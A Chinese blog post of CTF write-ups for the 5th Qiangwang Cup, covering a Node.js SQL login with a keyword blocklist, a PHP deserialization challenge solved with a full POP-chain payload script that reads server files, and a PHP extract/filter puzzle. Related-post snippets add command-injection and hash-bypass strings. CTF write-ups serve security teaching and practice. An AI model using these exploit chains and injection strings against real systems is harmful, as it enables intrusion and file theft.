第五届强网杯某些wp

最新推荐文章于 2024-03-09 20:53:50 发布
最新推荐文章于 2024-03-09 20:53:50 发布
阅读量637 收藏
点赞数
分类专栏: CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/117844766
版权

1.SQL

这题是nodejs的题

F12提示得到源码:

const salt = random('Aa0', 40);
const HashCheck = sha256(sha256(salt + 'admin')).toString();

let filter = (data) => {
    let blackwords = ['alter', 'insert', 'drop', 'delete', 'update', 'convert', 'chr', 'char', 'concat', 'reg', 'to', 'query'];
    let flag = false;

    if (typeof data !== 'string') return true;

    blackwords.forEach((value, idx) => {
        if (data.includes(value)) {
            console.log(`filter: ${value}`);
            return (flag = true);
        }
    });

    let limitwords = ['substring', 'left', 'right', 'if', 'case', 'sleep', 'replace', 'as', 'format', 'union'];
    limitwords.forEach((value, idx) => {
        if (count(data, value) > 3){
            console.log(`limit: ${value}`);
            return (flag = true);
        }
    });

    return flag;
}
app.get('/source', async (req, res, next) => {
    fs.readFile('./source.txt', 'utf8', (err, data) => {
        if (err) {
            res.send(err);
        }
        else {
            res.send(data);
        }
    });
});

app.all('/', async (req, res, next) => {
    if (req.method == 'POST') {
        if (req.body.username && req.body.password) {
            let username = req.body.username.toLowerCase();
            let password = req.body.password.toLowerCase();

            if (username === 'admin') {
                res.send(`<script>alert("Don't want this!!!");location.href='/';</script>`);
                return;
            }
            
            UserHash = sha256(sha256(salt + username)).toString();
            if (UserHash !== HashCheck) {
                res.send(`<script>alert("NoNoNo~~~You are not admin!!!");location.href='/';</script>`);
                return;
            }

            if (filter(password)) {
                res.send(`<script>alert("Hacker!!!");location.href='/';</script>`);
                return;
            }

            let sql = `select password,username from users where username='${username}' and password='${password}';`;
            client.query(sql, [], (err, data) => {
                if (err) {
                    res.send(`<script>alert("Something Error!");location.href='/';</script>`);
                    return;
                }
                else {
                    if ((typeof data !== 'undefined') && (typeof data.rows[0] !== 'undefined') && (data.rows[0].password === password)) {
                        res.send(`<script>alert("Congratulation,here is your flag:${flag}");location.href='/';</script>`);
                        return;
                    }
                    else {
                        res.send(`<script>alert("Password Error!!!");location.href='/';</script>`);
                        return;
                    }
                }
            });
        }
    }

    res.render('index');
    return;
});

理论上这道题的username可以使用ADMİN来绕过,但实际失败了,怪事

const crypto=require('crypto');
const salt = 'Ao1';
//var obj=crypto.createHash('md5');
var obj=crypto.createHash('sha256');
var obj1=crypto.createHash('sha256');
 
obj.update(salt+'admin');
 
var str=obj.digest('hex');//hex是十六进制
 
console.log(str); 
obj1.update(salt+'ADMIN'.toLowerCase());
 
var str1=obj1.digest('hex');//hex是十六进制
 
console.log(str1===str); 
console.log('admin'==='ADMİN'.toLowerCase());

 

 

 

强网先锋-赌徒:

扫目录得到www.zip。

审计下源码发现是序列化:

<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
	
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
	
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new  Start();
}

?>

这里有三个类room,info和start,需要构造pop链使用文件包含读取文件,分析一下,

GET传入一个start的类,反序列化调用_sayhello方法。

_sayhello输出类中的name成员.

这里把name设置为room类.

最终的payload:

<?php
class Start
{
    public $name;
    public $flag;
	

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
	
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a;
	
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    public function Get_hint($file){
        $hint='fuck you';
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}
$c = new Room();
$d = new Room();
$d->filename="/etc/hint";
$c->a = $d; 
$b = new Info();
$b->file['filename'] = $c;
$a = new Start();
$a->name = $b;
$a->flag = "/etc/hint";


$pop = serialize($a);
echo urlencode($pop);
// unserialize($pop);

?>

然后得到提示:

visit gam3.php

估计这就是赌徒这个题目的精髓了。

使用相同的payload读一下gam3.php:

<?php

session_start();

?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>游戏中心</title>
    <link rel="stylesheet" type="text/css" href="css/identify.css"/>
    <link rel="stylesheet" type="text/css" href="css/layout.css"/>
    <link rel="stylesheet" type="text/css" href="css/account.css"/>
    <link rel="stylesheet" type="text/css" href="css/style.css"/>
    <link rel="stylesheet" type="text/css" href="css/control_index.css"/>
    <script type="text/javascript" src="js/jquery-1.7.2.min.js"></script>
    <script type="text/javascript" src="js/select.js"></script>
</head>

<body>
<div class="view-topbar">
    <div class="topbar-console">
        <div class="tobar-head fl">
            <a href="#" class="topbar-logo fl">
                <span><img src="Images/logo.png" width="20" height="20"/></span>
            </a>
            <a href="gam3.php" class="topbar-home-link topbar-btn text-center fl"><span>游戏大厅</span></a>
        </div>
    </div>
    <div class="topbar-info">
    </div>
</div>
<div class="view-body">
    <div class="view-sidebar">
        <div class="sidebar-content">
            <div class="sidebar-nav">
                <div class="sidebar-title">
                    <a href="#">
                        <span class="icon"><b class="fl icon-arrow-down"></b></span>
                        <span class="text-normal">我的游戏</span>
                    </a>
                </div>
                <ul class="sidebar-trans">
                    <li>
                        <a href="#">
                            <b class="sidebar-icon"><img src="Images/icon_author.png" width="16" height="16"/></b>
                            <span class="text-normal">掷硬币</span>
                        </a>
                </ul>
            </div>
        </div>
    </div>
</div>
<?php
$arr = array(3436, 6275, 7481, 6283, 8996, 4951, 6691, 1706, 5912, 5160, 1039, 5281, 1080, 9120, 1630, 6405, 6200, 2272, 3235, 8741, 6317, 1161, 5463, 2227, 8930, 3259, 3679, 2812, 5324, 8160, 6710, 8098, 5251, 2085, 6740, 6798, 3839, 5513, 7080, 5085, 9397, 9329, 6792, 5053, 3195, 8541, 3242, 2603, 1653, 3580);
$newarr = array_rand($arr, 1);
?>
<div class="view-product background-color">
    <div class="padding-big background-color">
        <br/><br/><br/>猜硬币正反,连续猜对五次胜利<br/><br/>你已经猜对了<?php echo($_SESSION['num']); ?>次<br/><br/>

        <form method="post" action="gam3.php">
            <p>
                正: <input type="radio" name="guess" checked="yes" value="on"/><br/>
                反: <input type="radio" name="guess" value="off"/>
            </p><br/>

            <p>
                <img id="captcha_img" border="1" src="./pic/<?php echo $arr[$newarr]; ?>.jpg" width=100
                     height=30>
            </p>
            <p>请输入图片中的内容:<input type="text" name="authcode" value=""/></p><br/>
            <p><input type="submit" value="提交"
                      style="background-color: #7ED321;width: 76px;height: 25px;color: #FFFFFF"></p>
        </form>
        <br/>
        <?php if ($_SESSION['num'] >= 5) 
		{
			include "/flag";
        } 
	?>
    </div>
</div>

<script>
    $(".sidebar-title").live('click', function () {
        if ($(this).parent(".sidebar-nav").hasClass("sidebar-nav-fold")) {
            $(this).next().slideDown(200);
            $(this).parent(".sidebar-nav").removeClass("sidebar-nav-fold");
        } else {
            $(this).next().slideUp(200);
            $(this).parent(".sidebar-nav").addClass("sidebar-nav-fold");
        }
    });
</script>
</body>

<?php
if (!isset($_SESSION['num'])) {
    $_SESSION['num'] = 0;
}
if (!isset($_SESSION['authcode'])) {
    $_SESSION['authcode'] = $arr[$newarr];
}
if (isset($_REQUEST['authcode'])) {
    if (strtolower($_REQUEST['authcode']) == $_SESSION['authcode']) {
        $answer = substr(rand(), 3, 1);
        if ($answer < 5) {
            $answer = "on";
        } else {
            $answer = "off";
        }
        if ($answer == $_POST['guess']) {
            $_SESSION['num']=$_SESSION['num']+1;
        } else {
            $_SESSION['num'] = 0;
        }
    } else {
        echo "<script>alert('验证码错误');</script>";
    }
    $_SESSION['authcode'] = $arr[$newarr];
}

?>

发现了/flag。

同样的payload读取/flag拿到flag:

3.pop_master

 

访问题目中

<?php
include "class.php";
//class.php.txt
highlight_file(__FILE__);
$a = $_GET['pop'];
$b = $_GET['argv'];
$class = unserialize($a);
$class->LyQPV1($b);

的txt得到16万行的源码。

有点无语。

4.[强网先锋]寻宝

提示1:

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


function filter($string){
        $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
        $filter_phrase= '/'.implode('|',$filter_word).'/';
        return preg_replace($filter_phrase,'',$string);
    }


if($ppp){
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';

extract($_POST);

$num1 = filter($ppp['number1']);        
$num2 = filter($ppp['number2']);        
$num3 = filter($ppp['number3']);        
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);    


if(isset($num1) && is_numeric($num1)){
    die("非数字");
}

else{
  
    if($num1 > 1024){
    echo "第一层";
        if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
            echo "第二层";
            if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
                echo "第三层";
                if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
                    echo "第四层";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    $b=json_decode(@$num5);
                        if($y = $b === NULL){
                                if($y === true){
                                    echo "第五层";
                                    include 'KeY1lhv.php';
                                    echo $KEY1;
                                }
                        }else{
                            die("no");
                        }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}


非数字

 

KogRow(接毕设和大作业版)
关注
专栏目录
2023强网杯wp-强网先锋
若谷的博客
12-19 923
2023强网杯
2022年强网杯rcefile wp
weixin_52829570的博客
08-01 1200
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
2021第五届强网杯部分writewp
zji
06-14 1203
第五届强网杯部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网杯部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网先
强网杯web部分wp
freerats的博客
08-26 527
主动 ?ip=127.0.0.1|cat ls 使用内联执行 Funhash hash1=0e001233333333333334557778889可绕过 数组绕过 ffifdyop构成万能密钥 ?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop flag{y0u_w1ll_l1ke_h4sh} web辅助 看到这个熟悉的替换,可以进行序列化字符逃逸 class.php里面的几个函
强网杯wp
Sentiment的博客
07-22 1055
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网杯wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
第二届强网杯wp
03-29 257
web web签到 利用了md5碰撞 payload为 param1 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%6...
第四届强网杯部分wp
weixin_44110537的博客
08-24 322
babycrt 通过分析sign函数中的代码,可以得到以下的等式:(记sign输出的值为ans) ans=S(c1*c2)%pq m+1-c1=Se1%t1…1 m+1-c2=Se2%t2…2 e1d=1%t1-1…5 e2d=1%t2-1…6 ed=1%(p-1)(q-1) Sq=md%qt2 Sp=(m+k)d%pt1 n=pq 通过观察S的生成方法可以知道S是余数为(Sq,Sp) 模数为 (qt2,pt1)的一个共同解(CRT),于是有: md=S%qt2 (m+k)d=S%pt1 即: md=S%q
强网杯2020线上赛部分wp
qq_36495104的博客
08-30 883
WEB Funhash 参考 https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4 exp hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop Web辅助 这题是学弟做出来的@Sn0w33 1.php反序列化时,S会把binary string当做字符 2.__wakeup()当属性个数大于实际属性个数时会跳过__wakeup() 3.字符串逃逸 五个字符\
第四届“强网杯”全国网络安全挑战赛_部分WP
Lemon's blog
08-25 3208
前言: 全靠大佬带飞,自己菜的一批,还需继续努力!,记录一下
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
2022强网杯web方向wp
xjh8023的博客
08-01 1506
考点文件泄露,、文件上传、文件包含、反序列化1.扫描目录存在www.zip,存在源码泄露2.代码审计,写一个inc文件内容为上传该文件,修改类型为image/jpeg2.进行反序列化,new一个类3.抓包将反序列化的值赋值给userfile,发包得到fla。...
广东省第四届“强网杯”网络安全大赛(“泄露的秘密WP”)
weixin_46245411的博客
10-14 5256
感觉应该就算交了WP也进不了决赛~~ 我直接把WP放这里 “泄露的秘密”: 发现存在大量“HTTP”包。 下一步跟踪HTTP流后, 发现存在SQL注入攻击。 使用python脚本获取传递的参数信息:(附上脚本) import pyshark import urllib import re file=pyshark.FileCapture('log.pcapng',display_filter="http") ...
2022强网杯WP
CK_0ff的博客
08-08 2860
2022强网杯WP
2023年第七届强网杯初赛 WP
渗透测试研究中心
12-22 3152
最坏情况下,前5次全输,需要87步即可达到260分,即第92轮时,因此可以通过本题。利用SQL注入修改data数据的值,本题data是数组,且会插入数据库,最终的payload需要改一下让前后闭合,且TP5,在网上找一个链子的EXP改一下。当然,前一题的SQL注入点依然存在,不过依然需要鉴权进入后台,这意味着,只需要我们能进入后台,就能通过load_file的方式读取flag。简单来说,就是能set任意的值,例如下方的payload,就能注入一个snowwolf的键,且值为wolf,4代表数据长度。
2023年第七届强网杯部分WP
qq_65165505的博客
12-18 2914
在这个网站直接记载了2的27次方的阶乘的每一位数字之和对4495662081取个sha256即可。
强网杯2020部分WP
Sea_Sand息禅
08-24 2683
Funhash 有三个level,一个一个过 level1: hash函数之后的值等于原值,也就是使用hash进行md4加密之后的密文=明文,比较常见的有0e碰撞相等 给出两个加密之后开头仍是0e的字符串:0e251288019、0e001233333333333334557778889 hash1=0e001233333333333334557778889绕过level1 level2 数组绕过:hash2[]=1&hash3[]=3 level3 特殊字符绕过:hash4=ffifdyop
第七届强网杯wp
最新发布
m0_73373164的博客
03-09 414
通过nc连接的满足为全部都是1后就能得到flag首先一个一个试拿0试然后到Z可以试出必须为9位并且前面两位是什么都行exp。
2022强网杯pwn部分wp
N1rvana的博客
08-02 1545
2022强网杯pwn
2020强网杯flower题wp
sln_1550的博客
08-27 532
从apk中解压出libnative.so 拖入IDA,发现加密算法在sub_F34中: 关键部分有花指令,patch后可以直接F5看C源码 整个代码逻辑用python描述如下: 主要操作是对输入的flag字符串前后各用首字节和尾字节填充满128字节,然后加密变化后和固定字符串比较。 根据算法逆写解密程序并执行出结果 ...
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要注意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了网络安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值